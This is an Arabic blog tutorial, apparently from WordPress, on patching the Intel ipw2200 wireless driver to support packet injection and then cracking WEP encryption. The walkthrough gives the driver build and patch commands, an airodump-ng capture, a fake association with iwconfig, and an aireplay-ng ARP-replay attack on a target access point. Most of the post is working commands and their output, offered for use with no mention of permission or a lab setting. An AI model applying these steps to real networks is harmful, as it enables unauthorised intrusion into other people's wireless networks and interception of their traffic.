Howto injection with intel ipw2200


درسنا اليوم عن طريقة جعل احد كروت انتل يعمل عليه اﻻنجكشن جميع كروت انتل ﻻ تستطيع عن طريقها عمل انجكشن لزيادة الباكيت في كسر تشفير WEP , كان الحل للجميع انه يشتري كرت جديد يدعم اﻻنجكشن وطبعاً يعتمد على chipset , في هذا الدرس سوف أشرح طريقة جعل أحد كروت انتل تدعم اﻻنجكشن والكرت هوه ipw2200 ,, يلة نبدي…..يا الله
1/ نحتاج أن ننصب بعض الباكج الضرورية طبعاً تستطيع أن تنصبها حسب مدير الحزم الخاص بتوزيعتك
sudo apt-get install build-essential
sudo apt-get install linux-source
sudo apt-get install linux-headers-`uname -r`
sudo apt-get install sharutils
اﻻن نطبق اﻻمر التالي لعمل رابط لمجلد headers في المسار /usr/src/linux

sudo ln -s /usr/src/linux-headers-`uname -r`/ /usr/src/linux

ثم نطبق اﻷمر ويجب أن تكون مثل نتيجة اﻷمر

root@myrul3z:/usr/src# ls -l /usr/src/linux
lrwxrwxrwx 1 root src 41 2007-12-15 19:44 /usr/src/linux -> /usr/src/linux-headers-2.6.20-15-generic
/ لجعل كرت انتل يعمل عليه اﻻنجكشن يجب علينا تنصيب الباتش ضروري جداً والباتش يتركب اولاً على التعريف ثم تقوم بتنصيبه إصدار الباتش يوجد ﻷصدارات قديمة ولكن أخر إصدار لتعريف كرت ipw2200 لم ينزل حتى اﻻن وهوه ipw2200 1.2.2 إصدار الباتش الذي سوف نركبه سوف يكون اصداره 1.2.1 وأيضاً تعريف ieee80211 1.2.17 إضافة للباتش 1.2.1 لذا سوف نقوم بتحميل التالي

1-2/ تحميل تعريف ipw2200 version 1.2.1 الرابط http://ipw2200.sourceforge.net/downloads.php
2-2- / تحميل تعريف ieee80211 version 1.2.17 الرابط http://ieee80211.sourceforge.net/#downloads
3-2 / تحميل الباتش لتعريف ipw2200 version 1.2.1 الرابط http://www.box.net/shared/j3qvacbbmb
4-2 / إنشاء مجلد ووضع فيه جميع الملفات التي تم تحميلها
5-2/ فك الضغط عن الملفات التي تم تحميلها

tar -xvf ipw2200-1.2.1-inject_patch.tar.gz
tar -xvf ipw2200-*.tgz
tar -xvf ieee80211-*.tgz

6-2/ تطبيق الباتش على التعريف

patch -p0 < ipw2200-1.2.1-inject.patch
patch -p0 < ipw2200-1.2.1-inject_Makefile.patch

7-2/ تنصيب تعريف ieee80211
ملاحظة قبل التنصيب يجب علينا حذف الاصدار القديم وتنصيب اﻻصدار 1.2.17

root@myrul3z:/home/br0ken/injection# cd ieee80211-1.2.17
root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# sh remove-old

بعد تنفيذ اﻷمر sh remove-old لحذف النسخة سوف يسألك بعض اﻷسئلة ضع جميعها y

root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# make
root@myrul3z:/home/br0ken/injection/ieee80211-1.2.17# make install

8-2/ تنصيب تعريف ipw2200
ملاحظة قبل التصيب يجب علينا حذف الاصدار القديم وتنصيب اﻻصدار 1.2.1

root@myrul3z:/home/br0ken/injection# cd ipw2200-1.2.1
root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# sh remove-old

بعد تنفيذ اﻷمر sh remove-old لحذف النسخة سوف يسألك بعض اﻷسئلة ضع جميعها y

root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# make
root@myrul3z:/home/br0ken/injection/ipw2200-1.2.1# make install

9-2/ عمل ريستارت للجهاز

10-2/ التحقق من اﻻصدار لـ ieee80211 and ipw2200

root@myrul3z:/home/br0ken# dmesg | grep ipw
[ 19.940000] ipw2200: Intel(R) PRO/Wireless 2200/2915 Network Driver, 1.2.1dmprq
[ 19.940000] ipw2200: Copyright(c) 2003-2006 Intel Corporation
[ 20.092000] ipw2200: Detected Intel PRO/Wireless 2200BG Network Connection
[ 20.408000] ipw2200: Radio Frequency Kill Switch is On:
[ 20.408000] ipw2200: Detected geography ZZM (11 802.11bg channels, 0 802.11a channels)

root@myrul3z:/home/br0ken# dmesg | grep ieee
[ 19.768000] ieee80211_crypt: registered algorithm ‘NULL’
[ 19.824000] ieee80211: 802.11 data/management/control stack, 1.2.17
[ 19.824000] ieee80211: Copyright (C) 2004-2005 Intel Corporation

3/ تحميل الدرايف الجديد [ Load] وإنشاء انترفيس بأسم rtap0
راح يكون rtap0 للـ listening و eth* الـ injecting

sudo rmmod ipw2200
sudo modprobe ipw2200 rtap_iface=1
sudo ifconfig rtap0 up

4/ طريقة الهجوم بكرت ipw2200
أي كرت يدعم packets injection راح تقدر تستخدم جميع طرق الهجوم الموجودة في aireplay-ng لكن في كرت انتل مع patch injection سوف تكون محدودة على طرق معينة فقط يوجد طرق ﻻ تعمل مع الكرت الطرق التي تعمل مع كرت انتل هي 3 طرق فقط أما باقي الطرق ﻻ تعمل والله أعلم

interactive
arpreplay
chopchop

4-1/ سوف أشرح أحد طرق الهجوم لسبب ما أنها تختلف اختلاف بسيط عن الكروت التي تدعم packet injection من اﻷساس التقاط الباكيت باﻷداة airodump-ng وراح نستخدم النترفيس rtap0

airodump-ng -c 1 –bssid MAC-AP -w dump rtap0

4-2/ عمل fake للاكسس بوينت هذي الخطوة مهمة ﻷنه عشان تقدر ترسل arp request للاكسس بوينت ويقبلها ﻻزم الكلاينت يكون شابك associate وراح نستخدم الماك ادرس تبعه لذلك راح نسوي fake ونستخدم الماك ادرس الخاص بكرتنا

iwconfig eth1 essid SpeedTouch433793 channel 1 key s:fakekey mode managed

4-3/ استخدم طريقة الهجوم arpreplay ﻷرسال arp request للاكسس بوينت لزيادة الباكيت وكسر تشفير WEP

aireplay-ng -3 -b MAC-AP -h MAC-Client -i rtap0 eth1

وراح تشاهد الباكيت في ازدياد بشكل خيالي

اتمنى الشرح يكون واضح
احترامي

  1. لا يوجد تعليقات.
  1. No trackbacks yet.

أضف تعليقاً

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

WordPress.com Logo

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   / تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   / تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   / تغيير )

Google+ photo

أنت تعلق بإستخدام حساب Google+. تسجيل خروج   / تغيير )

Connecting to %s

%d مدونون معجبون بهذه: